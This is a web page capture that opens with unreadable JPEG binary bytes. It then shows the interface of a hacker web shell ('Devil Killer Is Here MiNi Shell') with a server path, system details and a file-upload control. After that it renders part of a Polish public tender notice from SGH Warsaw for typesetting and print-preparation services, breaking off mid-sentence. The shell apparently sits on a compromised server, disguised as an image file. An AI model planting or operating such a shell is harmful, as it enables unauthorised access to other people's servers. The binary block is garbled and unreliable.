JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251015/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251015/0047531301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi w zakresie składu i łamania tekstu, wykonania rysunków, tabel, wzorów, z nanoszeniem poprawek po korektach językowych i technicznych, przygotowania do druku książek i czasopism </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZKOŁA GŁÓWNA HANDLOWA W WARSZAWIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Podmiot należący do grupy VAT o nazwie Szkoła Główna Handlowa Grupa VAT w Warszawie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001502</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Niepodległości 162</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-554</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">coz@sgh.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">sgh.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi w zakresie składu i łamania tekstu, wykonania rysunków, tabel, wzorów, z nanoszeniem poprawek po korektach językowych i technicznych, przygotowania do druku książek i czasopism </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0263d870-e5f3-490f-aff7-2b77636351dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00475313</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00295037/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.57 Łamanie, skład i przygotowanie do druku książek i czasopism</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://sgh.eb2b.com.pl/open-preview-auction.html/491151 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://sgh.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem Platformy Zakupowej (dalej jako „Platforma” lub „Platforma Zakupowa”) dostępnej pod adresem: https://sgh.eb2b.com.pl.<br/>2.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a wykonawcami, w tym wszelkie wnioski, zawiadomienia, informacje, oraz pozostałe dokumenty i oświadczenia, w tym dokumenty i oświadczenia składane na wezwanie Zamawiającego, przekazywane są w formie elektronicznej za pośrednictwem elektronicznej Platformy Zakupowej dostępnej pod adresem: https://sgh.eb2b.com.pl poprzez zakładkę „Pytania / Informacje” lub za pośrednictwem poczty elektronicznej, e-mail: coz@sgh.waw.pl. <br/>3.	Za datę wpływu wniosków, zawiadomień oraz informacji przyjmuje się datę ich wczytania do Platformy.<br/>4.	Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie rodzajów podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>5.	Osobą uprawnioną przez Zamawiającego do kontaktu z wykonawcami jest: Katarzyna Wojtyńska, email: coz@sgh.waw.pl lub inna osoba zastępująca.<br/>6.	Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie rejestrując się lub logując, w przypadku posiadania konta w Platformie Zakupowej, akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na stronie internetowej https://sgh.eb2b.com.pl/ oraz uznaje go za wiążący. Zamawiający poniżej określa instrukcję korzystania z Platformy Zakupowej w niniejszym postępowaniu:<br/>a)	w zakładce „Postępowania”, dalej „Lista postępowań otwartych” wykonawca wybiera niniejsze postępowanie oraz korzystając z polecenia „Zgłoś się do udziału w postępowaniu”, przechodzi odpowiednio do Formularza rejestracyjnego – w przypadku, kiedy wykonawca nie posiada konta na Platformie, lub panelu logowania użytkownika na Platformie w przypadku posiadania konta na Platformie;<br/>b)	po wypełnieniu formularza rejestracyjnego wykonawca otrzymuje wiadomość elektroniczną (e-mail) informującą, że może dokonać pierwszego logowania do Platformy. UWAGA: Rejestracja nowego konta podlega weryfikacji i akceptacji Operatora, która może potrwać do 24h (8h roboczych);<br/>c)	zgłoszenie do postępowania wymaga zalogowania wykonawcy do Platformy. Po wprowadzeniu danych użytkownika tj. adresu e-mail oraz hasła zgłoszenie jest automatycznie akceptowane przez Platformę;<br/> Z uwagi na ograniczoną liczbę znaków szczegółowe informacje zawarte zostały w rozdziale VIII Specyfikacji Warunków<br/>Zamówienia oraz w zakładce &#34;Pomoc&#34; Platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja o zasadach przetwarzania danych osobowych przez Szkołę Główną Handlową w Warszawie, określone zostały w Rozdziale XXII SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja o zasadach przetwarzania danych osobowych przez Szkołę Główną Handlową w Warszawie, określone zostały w Rozdziale XXII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ACOZ.25.1.59.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest:<br/>1)	skład, łamanie, wykonywanie rysunków, tabel, wzorów, nanoszenie poprawek po korektach językowych i technicznych, przygotowanie plików produkcyjnych do druku książek i czasopism naukowych (zawierających, oprócz tekstu podstawowego i tytułów, również wzory, tabele, wykresy, rysunki, zdjęcia, przypisy, bibliografie), przekształcanie otrzymywanych plików graficznych i dostosowywanie ich do wymogów składu i produkcji, generowanie plików do zamieszczenia w Internecie w następujących formatach i przewidywanej, szacowanej liczbie stron danego rodzaju formatu:<br/>Lp.	Rodzaj usługi	Przewidywana całkowita liczba stron danego rodzaju usługi<br/> <br/>1	format B5	20 000<br/>2	format A5	1 500<br/>3	format A4	1 000<br/>4	format 190 x 265	2 000<br/><br/>2)	dodruki i wznowienia: nanoszenie poprawek, uzupełnień i korekta składu opracowań archiwalnych w następujących formatach i przewidywanej, szacowanej liczbie stron danego rodzaju formatu:<br/><br/>Lp.	Rodzaj usługi	Przewidywana całkowita liczba stron danego rodzaju usługi<br/> <br/>1	format B5	700<br/>2	format A5	150<br/>3	format A4	100<br/><br/>2.	Uwaga: Podane w ust. 1 ppkt 1) i 2) oraz w Formularzu cenowym (Załącznik nr 2 do SWZ) przewidywane liczby stron stanowią wielkość szacunkową, ogólna wartość zamawianych usług nie może przekroczyć kwoty określonej w umowie.<br/>3.	Wykonawca będzie realizował przedmiot umowy na podstawie zleceń przekazywanych przez Zamawiającego według jego potrzeb.<br/>4.	Zamawiający zastrzega sobie prawo przekazywania do wykonania kilku zleceń jednocześnie, co nie może wydłużyć czasu realizacji poszczególnych zadań.<br/>5. Szczegółowy opis, zakres, warunki i sposób realizacji przedmiotu zamówienia określa SWZ oraz Załącznik nr 10 do SWZ<br/>– Wzór umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79822000-2 - Usługi składu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79822300-5 - Usługi składania</p> <p class="mb-0">79822500-7 - Usługi projektów graficznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. Zamawiający przewiduje udzielenie zamówień polegających na powtórzeniu podobnych do zamówienia podstawowego usług na podstawie art. 214 ust. 1 pkt 7 Ustawy Pzp.<br/>2. Podobne zamówienie może zostać udzielone w okresie 3 lat od dnia udzielenia zamówienia podstawowego, w trybie zamówienia<br/>z wolnej ręki, po wcześniejszym przeprowadzeniu negocjacji z Wykonawcą, w szczególności w zakresie warunków umowy, w tym<br/>ceny, terminu obowiązywania, czasu realizacji poszczególnych zleceń i może obejmować swoim zakresem:<br/>1) skład, łamanie, wykonywanie rysunków, tabel, wzorów, nanoszenie poprawek po korektach językowych i technicznych,<br/>przygotowanie plików produkcyjnych do druku książek i czasopism naukowych (zawierających, oprócz tekstu podstawowego i<br/>tytułów, również wzory, tabele, wykresy, rysunki, zdjęcia, przypisy, bibliografie), przekształcanie otrzymywanych plików graficznych i<br/>dostosowywanie ich do wymogów składu i produkcji, generowanie plików do zamieszczenia w Internecie;<br/>2) dodruki i wznowienia: nanoszenie poprawek, uzupełnień i korekta składu.<br/>3. Zamówienia podobne, o których mowa w art. 214 ust. 1 pkt. 7) Ustawy Pzp, będą udzielone pod warunkiem wyczerpania kwoty<br/>maksymalnej umowy określonej w § 8 ust. 1.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający będzie przyznawał punktację w kryterium „Cena” (C) w następujący sposób:<br/>a) Opis sposobu oceny ofert dla kryterium C:<br/>Liczba punktów (max 40 pkt.) = cena brutto oferty z najniższą ceną / cena brutto oferty badanej x 40<br/>b) Uwagi:<br/>• Punktacja wyliczona będzie z dokładnością 2 miejsc po przecinku. W kryterium C, oferta może otrzymać maksymalnie 40 pkt.<br/>• Do oceny ofert w przedmiotowym kryterium Zamawiający przyjmie cenę oferty brutto z formularza oferty, stanowiącego załącznik<br/>nr 1 do SWZ.<br/>2. W kryterium „Jakość” (J) Zamawiający przyzna punkty w poniżej podany sposób:<br/>1) ocenie podlegać będą przekazane wraz z ofertą przedmiotowe środki dowodowe, o których mowa w rozdziale XIV ust. 2 pkt 1) lit.<br/>b) SWZ, tj. projekt makiety wykonany zgodnie ze wskazanymi w załączniku nr 8 do SWZ elementami oraz według wskazówek<br/>technicznych i z uwzględnieniem parametrów druku opisanych w załączniku nr 9 do SWZ, jako plik otwarty w programie InDesign<br/>oraz plik produkcyjny w formacie PDF lub w programach równoważnych kompatybilnych z tymi programami umożliwiające<br/>otworzenie i edytowanie – maksymalnie do 60 pkt., zgodnie z poniższymi podkryteriami:<br/>a) sposób prezentacji treści według kanonu obowiązującego dla publikacji naukowych (J1);<br/>b) poprawność pod względem technicznym przygotowania wzorów, tabel, wykresów (J2);<br/>c) precyzja składu (J3);<br/>d) walory wizualne/estetyczne (J4);<br/>e) zgodność z zasadami redakcji technicznej (J5);<br/>f) poprawność przygotowania pliku produkcyjnego (J6);<br/>2) W każdym z podkryteriów J1, J2, J3, J4, J5 i J6 wykonawca może otrzymać maksymalnie 10 punktów, które zostaną przyznane w<br/>następujący sposób:<br/>0 pkt. - projekt nie spełnia oczekiwań<br/>5 pkt. - projekt częściowo spełnia oczekiwania<br/>10 pkt. - projekt zdecydowanie spełnia oczekiwania<br/>3) Ocena projektu makiety zostanie dokonana w oparciu o normę PN–83/P-55366.<br/>3. Zamawiający udzieli zamówienia wykonawcy, którego oferta:<br/>1) została oceniona jako najkorzystniejsza w oparciu o podane kryteria oceny;<br/>2) odpowiada wszystkim wymaganiom przedstawionym w Ustawie Pzp;<br/>3) odpowiada wszystkim wymaganiom przedstawionym w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące zdolności<br/>technicznej lub zawodowej. Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca wykaże, że: <br/>a)	w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych wykonuje, co najmniej 2 usługi (jedna usługa rozumiana jako jedna umowa/zamówienie), z których każda polegała na składzie, łamaniu, wykonywaniu rysunków, tabel, wzorów, nanoszeniu poprawek po korektach językowych i technicznych, przygotowania plików produkcyjnych do druku książek <br/>i czasopism naukowych (zawierających, oprócz tekstu podstawowego i tytułów, również wzory, tabele, wykresy, rysunki, zdjęcia, przypisy, bibliografie), przekształcania otrzymywanych plików graficznych i dostosowywania ich do wymogów składu i produkcji oraz generowania plików do zamieszczenia w Internecie, o wartości nie mniejszej niż 50 000,00 zł brutto każda oraz przedstawi dowody potwierdzające ich należyte wykonanie lub wykonywanie.<br/><br/>UWAGA – Za książki i czasopisma naukowe, o których mowa powyżej, Zamawiający uważa artykuły i monografie naukowe zgodne z definicjami podanymi pod następującym odnośnikiem: https://biblioteka.akademiabialska.pl/czym-jest-artykul-i-monografia-naukowa.<br/>b)	skieruje do realizacji zamówienia co najmniej 5 osób o doświadczeniu odpowiednim do realizacji przedmiotu zamówienia, w szczególności legitymujące się:<br/>- bardzo dobrą znajomością programów z pakietu Adobe: InDesign, Photoshop, Illustrator lub równoważnych programów służących <br/>do projektowania, łamania, składania i przygotowywania do druku materiałów poligraficznych kompatybilnych z tymi programami umożliwiającymi otworzenie i edytowanie;<br/>- bardzo dobrą znajomością rozszerzonej wersji programu Acrobat (edycja plików, konwersja, korekta) lub równoważnym;<br/>- znajomością zasad składu i łamania publikacji naukowych;<br/>- umiejętnością projektowania publikacji naukowych;<br/>- umiejętnym i zgodnym z zasadami łączeniem tekstu z grafiką;<br/>- znajomością zasad redakcji technicznej;<br/>- umiejętnością odczytywania znaków korektorskich i posługiwania się nimi;<br/>- znajomością zasad typografii i technologii poligraficznych;<br/>- oceną dostarczonych materiałów pod kątem poprawnego przygotowania i umiejętność zakwalifikowania ich do użycia, także konwersją zapisu;<br/>- umiejętnością przygotowania materiałów składowych do druku <br/>i gruntowaną wiedzą na temat różnych technik druku;<br/>- znajomością zasad i praktyczną umiejętnością konwersji i zapisu <br/>w formatach przeznaczonych do internetu;<br/>- niezbędnym doświadczeniem na stanowisku operatora DTP/redaktora technicznego: 2 osoby z co najmniej 10-letnim doświadczeniem zdobytym w okresie ostatnich 12 lat przed terminem składania ofert oraz 3 osoby z co najmniej 5 – letnim doświadczeniem zdobytym w okresie ostatnich 7 lat przed terminem składania ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca na wezwanie Zamawiającego winien złożyć za pośrednictwem Platformy poprzez zakładkę „Pytania/Informacje” lub za pośrednictwem poczty elektronicznej (e-mail: coz@sgh.waw.pl) następujące dokumenty <br/>w celu potwierdzenia braku podstaw wykluczenia:<br/>a)	oświadczenie, w zakresie art. 108 ust. 1 pkt 5) Ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275, z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 4 do SWZ;<br/>b)	odpis lub informacja z Krajowego Rejestru Sądowego lub <br/>z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3 miesiące przed złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji – w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4) Ustawy Pzp*;<br/>* wskazany termin 3 miesięcy określony został w § 2 ust. 1 pkt 6 rozporządzenia ministra rozwoju, pracy i technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający <br/>od wykonawcy<br/>c)	oświadczenia wykonawcy o aktualności informacji zawartych <br/>w oświadczeniu, o którym mowa rozdziale XIV ust. 1 pkt 1), w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 pkt 3)-6) Ustawy Pzp oraz art. 109 ust. 1 pkt 5), 7), 8), 9) i 10) Ustawy Pzp – Załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca na wezwanie Zamawiającego winien złożyć za pośrednictwem Platformy poprzez zakładkę „Pytania/Informacje” lub za pośrednictwem poczty elektronicznej (e-mail: coz@sgh.waw.pl) następujące dokumenty w celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź 